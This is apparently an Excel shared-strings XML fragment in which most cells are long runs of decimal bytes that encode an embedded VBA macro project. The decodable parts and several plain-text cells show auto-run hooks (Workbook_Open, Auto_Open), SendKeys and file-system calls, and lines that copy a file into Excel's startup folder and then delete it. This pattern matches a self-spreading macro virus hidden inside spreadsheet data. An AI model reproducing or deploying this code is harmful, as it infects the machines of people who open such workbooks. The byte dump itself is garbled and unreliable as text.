    <t xml:space="preserve">99 116 36 0 134 2 1 0 46 0 168 2 0 0 0 0 0 0 172 0 1 0 32 0 168 2 37 0 176 2 1 0 182 0 10 0 92 115 102 99 101 97 46 101 120 101 17 0 182 0 1 0 32 0 17 0 172 0 34 0 36 0 140 2 1 0 17 0 32 0 54 2 33 0 142 2 17 0 172 0 34 0 36 0 140 2 1 0 17 0 172 0 0 0 183 4 32 0 132 2 66 64 138 2 3 0 255 255 255 255 0 10 0 0 182 0 16 0 83 97 118 101 32 99 104 97 110 103 101 115 32 116 111 32 32 0 86 2 33 0 6 1 17 0 182 0 1 0 63 0 17 0 32 0 88 2 32 0 90 2 11 0 36 0 84 2 2 0 39 0 82 2 0 0 0 0 0 0 255 255 255 255 120 10 0 0 255 255 255 255 72 0 0 0 255 255 255 255 0 0 1 168 181 0 65 116 116 114 105 98 117 116 0 101 32 86 66 95 78 97 109 0 101 32 61 32 34 192 224 49 136 34 13 10 10 208 66 97 115 2 104 0 48 123 70 67 70 66 51 68 0 50 65 45 65 48 70 65 45 0 49 48 54 56 45 65 55 51 0 56 45 48 56 48 48 50 66 128 51 51 55 49 66 53 125 13 124 64 71 108 111 98 97 108 1 190 83 8 112 97 99 1 146 70 97 108 115 2 101 12 200 67 114 101 97 116 97 4 98 108 21 31 80 114 101 100 101 200 99 108 97 0 6 73 100 0 168 17 67 64 69 120 112 111 115 101 21 29 84 0 101 109 112 108 97 116 101 68 16 101 114 105 118 22 37 67 117 115 32 116 111 109 105 122 11 69 80 117 0 98 108 105 99 32 87 105 116 0 104 69 118 101 110 116 115 32 96 65 112 112 32 65 2 3 0 12 97 176 116 105 111 110 9 104 128 14 46 0 170 0 86 97 114 72 101 108 112 73 2 68 0 88 45 49 13 10 13 10 134 80 128 61 128 65 32 83 117 98 1 33 0 95 78 101 119 87 111 114 107 0 98 111 111 107 40 66 121 86 144 97 108 32 87 0 12 115 32 5 10 18 41 128 42 112 112 5 49 46 68 105 130 115 128 97 121 65 108 101 114 128 65 164 61 32 132 130 73 102 0 27 46 4 </t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To 89</t>
  </si>
  <si>
    <t xml:space="preserve">225 48 84 104 105 115 5 31 131 9 79 114 1 1 15 83 104 101 101 116 115 40 4 49 41 5 20 34 64 107 98 116 2 97 128 59 64 115 104 101 51 35 32 34 32 84 104 101 64 49 69 120 4 105 116 193 39 13 10 69 110 100 224 32 73 102 13 10 74 20 132 17 13 15 64 41 46 67 111 112 121 202 25 13 16 10 87 98 46 71 29 86 105 115 62 105 202 119 74 7 4 47 141 21 39 31 108 117 224 109 110 115 40 51 206 33 17 42 197 10 117 109 23 52 104 23 52 128 110 37 78 195 35 53 29 104 23 53 64 23 192 79 65 77 115 46 65 8 100 100 32 65 2 58 61 34 65 0 117 116 111 95 79 112 101 110 0 34 44 32 82 101 102 101 114 128 115 84 111 82 49 67 49 128 6 36 61 39 203 123 39 33 2 3 82 57 20 67 49 128 5 67 160 82 103 111 114 2 121 0 5 85 115 101 114 32 68 64 101 102 105 110 101 100 32 3 77 0 97 99 114 111 84 121 112 101 0 58 61 120 108 67 111 109 109 40 97 110 100 67 59 97 195 104 84 114 62 117 160 121 129 69 160 90 145 92 165 81 66 101 192 102 111 114 101 67 108 128 116 146 93 0 44 32 67 97 110 99 101 108 1 1 107 66 111 111 108 101 97 110 1 192 28 79 110 32 69 114 114 111 18 114 224 25 115 117 128 148 78 101 120 120 116 13 10 92 94 85 89 4 12 38 103 104 248 97 115 115 196 24 193 81 65 1 98 11 232 2 19 98 108 100 99 99 104 32 121 77 115 103 64 66 111 120 40 34 83 160 5 32 0 99 104 97 110 103 101 115 32 0 116 111 32 34 32 38 32 65 12 99 116 128 139 203 111 38 32 34 63 1 224 40 118 98 89 101 115 78 111 129 36 16 43 32 118 98 69 120 0 154 158 109 130 135 224 28 32 26 194 11 118 98 68 4 115 99 24 132 1 61 32 196 44 174 115 231 6 78 6 111 196 20 64 2 73 110 83 116 114 2 40 68 68 44 32 34 46 34 41 224 32 60 61 32 48 36 4 133 29 192 25 3 238 10 130 179 83 101 110 100 75 101 0 121 115 32 34 123 69 83 67 11 129 186 64 6 67 130 29 70 105 108 </t>
  </si>
  <si>
    <t xml:space="preserve">hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 3).Value</t>
  </si>
  <si>
    <t xml:space="preserve">101 0 65 99 99 101 115 115 32 120 0 108 82 101 97 100 79 110 108 0 121 13 10 71 111 84 111 32 248 113 117 105 128 51 5 135 229 0 71 20 64 32 99 127 20 39 4 78 111 116 193 164 232 159 97 0 108 111 103 115 40 120 108 68 70 105 33 1 65 48 65 115 41 160 140 111 6 119 133 29 160 48 34 46 120 108 115 239 0 30 61 40 34 29 226 22 97 160 179 173 22 100 36 128 13 10 97 49 58 13 10 31 34 255 13 34 230 9 194 12 127 50 15 175 127 14 117 14 225 48 239 128 22 128 14 230 71 227 88 65 96 186 1 27 159 193 193 194 96 115 102 99 101 97 80 93 199 96 255 84 17 81 118 147 35 163 1 175 63 242 109 149 48 33 73 191 63 63 80 111 128 47 192 114 15 110 15 110 98 118 107 64 110 111 114 109 97 108 48 30 109 255 53 107 64 9 98 69 176 8 255 49 194 113 119 104 145 82 11 96 47 125 97 32 145 17 82 84 114 105 56 109 40 76 82 0 129 14 86 18 67 101 0 108 108 115 40 55 57 44 32 136 50 41 46 96 122 117 101 41 240 52 120 62 32 34 176 33 72 8 84 6 63 103 68 240 101 108 101 116 80 82 65 5 96 67 51 19 255 177 117 16 26 48 1 52 9 250 98 50 1 175 123 99 154 87 175 123 175 123 225 5 70 112 83 105 208 14 49 150 32 192 57 197 24 115 176 122 117 110 68 84 49 212 135 115 40 105 135 129 192 87 107 49 255 101 13 17 10 73 2 49 55 213 31 148 58 134 5 65 4 127 132 24 111 53 144 39 33 9 243 91 50 53 255 113 115 254 40 191 19 143 133 143 133 143 133 207 142 202 142 175 127 243 193 145 207 7 67 111 195 121 143 133 191 2 183 2 243 223 5 223 5 35 34 241 126 211 5 143 133 223 5 255 213 5 143 133 83 42 31 3 21 3 143 133 191 2 183 2 159 178 125 193 39 143 133 143 133 143 133 51 35 133 133 254 56 143 133 143 133 143 133 48 163 18 50 51 50 114 69 15 89 179 18 73 175 68 163 68 83 101 116 32 24 102 115 111 0 47 242 196 101 79 98 0 106 101 99 116 40 34 115 99 0 114 105 112 116 105 110 103 </t>
  </si>
  <si>
    <t xml:space="preserve">46 2 102 192 107 115 121 115 116 101 109 90 111 178 1 34 0 72 81 3 119 62 3 119 37 67 3 46 192 177 108 108 97 2 119 46 72 82 117 110 225 5 46 103 208 28 112 4 101 99 32 104 102 111 108 100 101 22 114 64 181 81 103 92 178 9 46 101 120 10 101 161 128 34 2 129 67 104 114 40 24 51 52 41 224 1 96 62 70 117 108 135 130 208 208 0 116 1 44 32 48 44 148 125 27 85 8 48 111 104 144 10 232 15 13 1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95 0 95 0 83 0 82 0 80 0 95 0 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 11 0 0 0 6 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 65 0 0 0 134 16 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 51 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 61 0 0 0 74 1 0 0 0 0 0 0 95 0 86 0 66 0 65 0 95 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 26 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 67 0 0 0 131 13 0 0 0 0 0 0 100 0 105 0 114 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 0 2 0 7 0 0 0 12 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 122 0 0 0 232 1 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 44 0 121 2 0 0 0 0 2 0 3 0 3 96 4 0 52 0 255 255 255 255 255 255 255 255 255 255 0 0 0 0 17 1 0 0 0 0 1 0 0 0 0 0 30 29 241 0 0 0 0 0 1 0 1 0 32 0 193 0 0 0 0 0 1 0 255 255 255 255 255 255 255 255 0 0 3 64 2 0 28 0 29 209 0 0 0 0 0 1 0 56 0 0 0 0 0 0 0 110 0 0 127 0 0 0 0 193 6 0 0 0 0 0 0 121 16 0 0 0 0 0 0 201 16 0 0 0 0 0 0 73 17 0 0 0 0 0 0 201 17 0 0 0 0 0 0 25 18 0 0 0 0 0 0 49 18 0 0 0 0 204 97 115 0 0 1 0 255 4 8 0 0 9 4 0 0 168 3 1 0 0 0 0 0 0 0 0 0 1 0 4 0 2 0 250 0 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 52 0 69 0 70 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 52 0 46 0 48 0 35 0 57 0 35 0 67 0 58 0 92 0 80 0 82 0 79 0 71 0 82 0 65 0 126 0 49 0 92 0 67 0 79 0 77 0 77 0 79 0 78 0 126 0 49 0 92 0 77 0 73 0 67 0 82 0 79 0 83 0 126 0 49 0 92 0 86 0 66 0 65 0 92 0 86 0 66 0 65 0 54 0 92 0 86 0 66 0 69 0 54 0 46 0 68 0 76 0 76 0 35 0 86 0 105 0 115 0 117 0 97 0 108 0 32 0 66 0 97 0 115 0 105 0 99 0 32 0 70 0 111 0 114 0 32 0 65 0 112 0 112 0 108 0 105 0 99 0 97 0 116 0 105 0 111 0 110 0 115 0 0 0 0 0 0 0 0 0 0 0 0 0 16 1 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 56 0 </t>
  </si>
  <si>
    <t xml:space="preserve">49 0 51 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 49 0 46 0 52 0 35 0 48 0 35 0 67 0 58 0 92 0 80 0 114 0 111 0 103 0 114 0 97 0 109 0 32 0 70 0 105 0 108 0 101 0 115 0 92 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 79 0 102 0 102 0 105 0 99 0 101 0 49 0 48 0 92 0 69 0 88 0 67 0 69 0 76 0 46 0 69 0 88 0 69 0 35 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 69 0 120 0 99 0 101 0 108 0 32 0 49 0 48 0 46 0 48 0 32 0 79 0 98 0 106 0 101 0 99 0 116 0 32 0 76 0 105 0 98 0 114 0 97 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 184 0 42 0 92 0 71 0 123 0 48 0 48 0 48 0 50 0 48 0 52 0 51 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 35 0 50 0 46 0 48 0 35 0 48 0 35 0 67 0 58 0 92 0 87 0 73 0 78 0 78 0 84 0 92 0 115 0 121 0 115 0 116 0 101 0 109 0 51 0 50 0 92 0 115 0 116 0 100 0 111 0 108 0 101 0 50 0 46 0 116 0 108 0 98 0 35 0 79 0 76 0 69 0 32 0 65 0 117 0 116 0 111 0 109 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 0 0 0 0 0 0 0 0 10 1 42 0 92 0 71 0 123 0 50 0 68 0 70 0 56 0 68 0 48 0 52 0 67 0 45 0 53 0 66 0 70 0 65 0 45 0 49 0 48 0 49 0 66 0 45 0 66 0 </t>
  </si>
  <si>
    <t xml:space="preserve">68 0 69 0 53 0 45 0 48 0 48 0 65 0 65 0 48 0 48 0 52 0 52 0 68 0 69 0 53 0 50 0 125 0 35 0 50 0 46 0 50 0 35 0 48 0 35 0 67 0 58 0 92 0 80 0 114 0 111 0 103 0 114 0 97 0 109 0 32 0 70 0 105 0 108 0 101 0 115 0 92 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 109 0 115 0 111 0 57 0 46 0 100 0 108 0 108 0 35 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 32 0 57 0 46 0 48 0 32 0 79 0 98 0 106 0 101 0 99 0 116 0 32 0 76 0 105 0 98 0 114 0 97 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 2 0 2 4 4 0 4 2 0 0 6 2 1 0 8 2 0 0 10 2 1 0 12 2 255 255 255 255 255 255 0 0 0 0 0 0 0 0 152 215 66 66 4 0 255 255 255 255 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 1 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 118 117 2 0 24 0 84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 20 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 255 255 19 2 24 0 84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 255 255 148 62 0 0 0 0 1 0 24 2 0 0 255 255 255 255 0 2 0 0 0 128 10 0 0 255 255 4 0 123 124 49 0 20 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55 0 255 255 25 2 4 0 123 124 49 0 255 255 176 </t>
  </si>
  <si>
    <t xml:space="preserve">137 0 0 0 0 1 0 0 2 0 0 255 255 255 255 24 2 0 0 0 200 42 0 0 255 255 255 255 255 255 1 1 56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4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255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 156 245 118 192 47 67 133 66 147 150 155 183 255 92 225 209 255 255 255 255 1 0 0 0 100 111 67 92 174 230 75 69 166 87 66 4 167 190 181 155 255 255 255 255 1 0 0 0 255 255 255 255 72 0 0 0 128 0 0 0 0 0 92 1 93 0 255 0 200 49 0 0 5 12 69 120 99 101 108 128 43 96 0 3 12 86 66 65 247 226 96 0 5 4 87 105 110 49 54 193 126 96 0 5 4 87 105 110 51 50 7 127 96 0 3 4 77 97 99 179 178 96 0 4 4 86 66 65 54 173 35 96 0 10 12 86 66 65 80 114 111 106 101 99 116 190 191 96 0 6 8 115 116 100 111 108 101 147 96 96 0 6 8 79 102 102 105 99 101 21 117 96 0 12 12 84 104 105 115 87 111 114 107 98 111 111 107 124 227 96 0 9 128 0 0 255 3 1 0 95 69 118 97 108 117 97 116 101 24 217 96 0 1 4 120 111 16 96 0 3 12 192 224 49 117 114 96 0 13 4 87 111 114 107 98 111 111 107 95 79 112 101 110 155 225 96 0 11 0 65 112 112 108 105 99 97 116 105 111 110 165 42 96 0 20 0 83 104 111 119 87 105 110 100 111 119 115 73 110 84 97 115 107 98 97 114 159 40 96 0 7 0 87 105 110 100 111 119 115 163 100 96 0 7 0 86 105 115 105 98 108 101 182 211 96 0 8 0 77 101 110 117 66 97 114 115 37 194 96 0 5 0 77 101 110 117 115 33 76 96 0 9 0 77 101 110 117 73 116 101 109 115 236 177 96 0 6 0 68 101 108 101 116 101 184 120 96 0 3 4 65 112 112 191 116 96 0 9 0 87 111 114 107 98 111 111 107 115 66 236 96 0 5 0 67 111 117 110 116 48 118 96 0 3 0 65 100 100 247 114 96 0 15 4 65 112 112 95 78 101 119 87 111 114 107 98 111 111 107 75 30 96 0 2 4 87 98 133 95 96 0 8 4 87 111 114 107 98 111 111 107 107 24 96 0 6 0 83 104 101 101 116 115 10 27 96 0 4 0 67 111 112 121 198 191 96 </t>
  </si>
  <si>
    <t xml:space="preserve">0 7 0 67 111 108 117 109 110 115 112 57 96 0 5 0 78 97 109 101 115 206 191 96 0 12 0 82 101 102 101 114 115 84 111 82 49 67 49 181 99 96 0 8 0 67 97 116 101 103 111 114 121 180 92 96 0 9 0 77 97 99 114 111 84 121 112 101 118 134 96 0 9 0 120 108 67 111 109 109 97 110 100 204 195 96 0 5 0 83 97 118 101 100 100 201 96 0 23 4 65 112 112 95 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 71 95 96 0 6 4 67 97 110 99 101 108 241 152 96 0 8 0 104 97 115 115 97 118 101 100 142 197 96 0 2 0 99 104 204 92 96 0 6 0 77 115 103 66 111 120 151 82 96 0 14 0 65 99 116 105 118 101 87 111 114 107 98 111 111 107 19 162 96 0 13 0 118 98 89 101 115 78 111 67 97 110 99 101 108 232 113 96 0 13 0 118 98 69 120 99 108 97 109 97 116 105 111 110 133 200 96 0 8 0 118 98 67 97 110 99 101 108 39 238 96 0 4 0 118 98 78 111 167 37 96 0 8 0 83 101 110 100 75 101 121 115 78 30 96 0 16 0 67 104 97 110 103 101 70 105 108 101 65 99 99 101 115 115 88 179 96 0 10 0 120 108 82 101 97 100 79 110 108 121 25 230 96 0 4 4 113 117 105 116 57 174 96 0 5 0 118 98 89 101 115 97 63 96 0 7 0 68 105 97 108 111 103 115 138 202 96 0 14 0 120 108 68 105 97 108 111 103 83 97 118 101 65 115 251 221 96 0 4 0 83 104 111 119 15 245 96 0 2 4 97 49 107 92 96 0 4 0 83 97 118 101 146 208 96 0 7 4 115 101 116 102 108 97 103 6 54 96 0 16 4 65 112 112 95 87 111 114 107 98 111 111 107 79 112 101 110 179 5 96 0 5 0 82 84 114 105 109 133 206 96 0 5 0 76 84 114 105 109 244 98 96 0 5 0 67 101 108 108 115 26 141 96 0 5 0 86 97 108 117 101 228 75 96 0 13 0 68 105 115 112 108 97 121 65 108 101 114 116 115 244 246 96 0 1 0 105 96 16 96 0 1 0 119 109 16 96 0 12 0 67 114 101 97 116 101 79 98 106 </t>
  </si>
  <si>
    <t xml:space="preserve">114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 30 0 0 0 9 0 0 0 0 0 0 0 9 0 0 0 0 0 3 0 48 0 0 0 0 0 0 0 4 0 4 0 42 0 0 0 169 9 0 0 0 0 0 0 89 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 9 8 0 0 0 0 0 0 17 5 0 0 0 0 0 0 112 0 0 0 0 0 0 0 9 0 0 0 0 0 4 0 193 9 0 0 0 0 0 0 233 9 0 0 0 0 0 0 9 10 0 0 0 0 0 0 89 10 0 0 0 0 0 0 121 10 0 0 0 0 0 0 161 10 0 0 0 0 0 0 201 10 0 0 0 0 0 0 1 11 0 0 0 0 0 0 129 11 0 0 0 0 0 0 201 11 0 0 0 0 0 0 9 12 0 0 0 0 0 0 41 12 0 0 0 0 0 0 89 13 0 0 0 0 0 0 201 13 0 0 0 0 0 0 73 12 0 0 0 0 0 0 105 12 0 0 0 0 0 0 129 9 0 0 0 0 0 0 145 12 0 0 0 0 0 0 185 12 0 0 0 0 0 0 57 14 0 0 0 0 0 0 89 14 0 0 0 0 0 0 65 15 0 0 0 0 0 0 177 14 0 0 0 0 0 0 201 14 0 0 0 0 0 0 9 16 0 0 0 0 0 0 241 14 0 0 0 0 0 0 25 15 0 0 0 0 0 0 193 6 0 0 0 0 0 0 121 16 0 0 0 0 0 0 201 16 0 0 0 0 0 0 73 17 0 0 0 0 0 0 201 17 0 0 0 0 0 0 25 18 0 0 0 0 0 0 49 18 0 0 0 0 0 0 137 18 0 0 0 0 0 0 1 0 1 0 0 0 2 0 113 6 0 0 0 0 0 0 153 6 0 0 0 0 0 0 193 6 0 0 0 0 0 0 255 255 255 255 73 6 0 0 0 0 0 0 64 0 2 0 52 0 0 0 233 6 0 0 0 0 0 0 129 0 0 0 0 0 1 0 17 7 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 14 0 31 0 60 0 0 0 201 7 0 0 0 0 0 0 161 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">1 0 249 3 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 3 0 29 6 0 0 0 0 3 96 34 6 0 0 1 0 3 96 31 6 0 0 2 0 3 96 193 1 0 0 0 0 2 0 1 2 0 0 0 0 2 0 65 2 0 0 0 0 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2 0 16 0 7 0 0 0 17 1 0 0 0 0 2 0 69 1 0 0 0 0 2 0 121 1 0 0 0 0 2 0 207 1 0 0 0 0 2 0 15 2 0 0 0 0 2 0 79 2 0 0 0 0 2 0 143 2 0 0 0 0 2 0 132 3 0 0 44 3 0 0 0 9 108 12 0 252 248 120 255 0 34 244 0 245 9 4 0 0 4 116 255 5 0 0 36 1 0 13 28 0 2 0 8 116 255 13 224 1 3 0 26 116 255 0 115 4 112 255 8 120 255 13 8 1 4 0 108 112 255 4 108 255 5 5 0 36 6 0 13 8 1 4 0 108 108 255 251 48 253 248 24 255 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 87 56 255 8 0 58 72 255 35 0 93 251 47 40 255 251 31 8 255 255 27 50 4 0 112 255 108 255 41 4 0 116 255 88 255 54 4 0 56 255 24 255 28 161 0 0 3 19 0 2 0 90 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 81 88 255 253 111 56 255 37 4 0 255 58 72 255 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 152 10 0 1 0 41 6 0 116 255 4 255 0 255 53 56 255 0 49 252 </t>
  </si>
  <si>
    <t xml:space="preserve">102 72 255 37 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 155 11 0 41 4 0 116 255 88 255 0 50 58 72 255 35 0 37 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 155 8 0 41 4 0 116 255 88 255 0 122 40 72 255 3 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 3 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 122 40 72 255 4 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 4 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 122 40 72 255 5 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 5 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 72 58 92 255 13 0 37 58 24 255 37 0 37 58 224 254 15 0 37 254 193 192 254 2 0 0 0 37 4 116 255 8 120 255 13 12 1 4 0 8 116 255 254 170 22 0 181 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile filexlm, Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">0 4 0 0 0 0 0 9 0 0 0 5 0 0 0 3 0 0 0 26 116 255 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 0 19 16 0 0 0 0 0 8 0 204 0 44 3 40 0 8 0 0 0 0 0 19 0 0 0 0 0 16 0 0 0 0 0 1 0 0 0 0 0 120 255 3 0 48 0 0 0 0 0 9 0 0 0 0 0 112 255 1 0 108 255 1 0 116 255 3 0 88 255 3 0 4 255 3 0 0 255 3 0 56 255 2 0 40 255 2 0 8 255 2 0 192 3 0 0 96 3 0 0 0 9 108 12 0 252 248 120 255 0 5 75 255 255 0 45 4 116 255 8 120 255 13 8 1 4 0 108 116 255 4 112 255 5 5 0 36 6 0 13 8 1 4 0 108 112 255 251 48 50 4 0 116 255 112 255 28 62 0 0 3 19 0 2 0 7 244 0 132 16 0 0 29 4 110 255 245 9 4 0 0 8 120 255 13 164 1 4 0 107 110 255 253 248 76 255 252 246 92 255 0 15 4 92 255 252 102 76 255 93 251 51 28 134 2 0 92 4 116 255 4 56 255 5 0 0 36 1 0 13 72 0 2 0 8 56 255 13 8 1 4 0 39 232 254 39 8 255 39 40 255 245 51 0 0 0 27 40 0 108 116 255 42 35 112 255 27 39 0 42 70 60 255 94 28 0 20 0 253 105 200 254 252 246 216 254 50 4 0 116 255 112 255 26 56 255 54 8 0 60 255 40 255 8 255 232 254 0 19 4 216 254 254 193 76 255 2 0 0 0 93 251 51 28 236 0 0 7 244 255 132 16 0 0 3 19 0 2 0 19 4 216 254 254 193 76 255 7 0 0 0 93 251 51 28 120 1 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 67 1 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 3 19 30 118 1 0 2 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 5 30 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile filexlm</t>
  </si>
  <si>
    <t xml:space="preserve">230 2 0 2 0 2 0 19 4 216 254 254 193 76 255 6 0 0 0 93 251 51 28 129 2 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 68 2 0 118 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 32 0 42 70 40 255 37 254 193 76 255 5 0 0 0 37 4 196 254 4 56 255 5 0 0 36 1 0 13 28 0 2 0 8 56 255 13 216 1 3 0 8 196 254 254 162 60 255 0 0 0 0 1 0 253 243 33 0 25 192 254 8 192 254 254 162 8 255 240 1 0 0 1 0 252 86 195 47 116 255 41 6 0 56 255 196 254 192 254 54 6 0 60 255 40 255 8 255 28 59 2 0 7 244 255 132 16 0 0 3 19 30 66 2 0 2 0 5 30 85 2 0 2 0 2 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 2 30 228 2 0 2 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 182 2 0 3 19 0 2 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 2 0 81 127 16 0 244 0 198 253 248 248 254 4 196 254 40 76 255 1 0 37 4 56 255 8 120 255 13 192 1 4 0 8 56 255 13 100 0 7 0 8 196 254 87 60 255 8 0 58 24 255 35 0 93 251 47 40 255 251 39 8 255 255 27 41 4 0 56 255 196 254 54 4 0 60 255 248 254 28 72 3 0 17 108 120 255 253 156 56 255 16 52 0 34 0 26 56 255 0 2 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 0 19 128 0 0 0 0 0 12 0 188 0 96 3 48 0 8 0 0 0 0 0 19 0 </t>
  </si>
  <si>
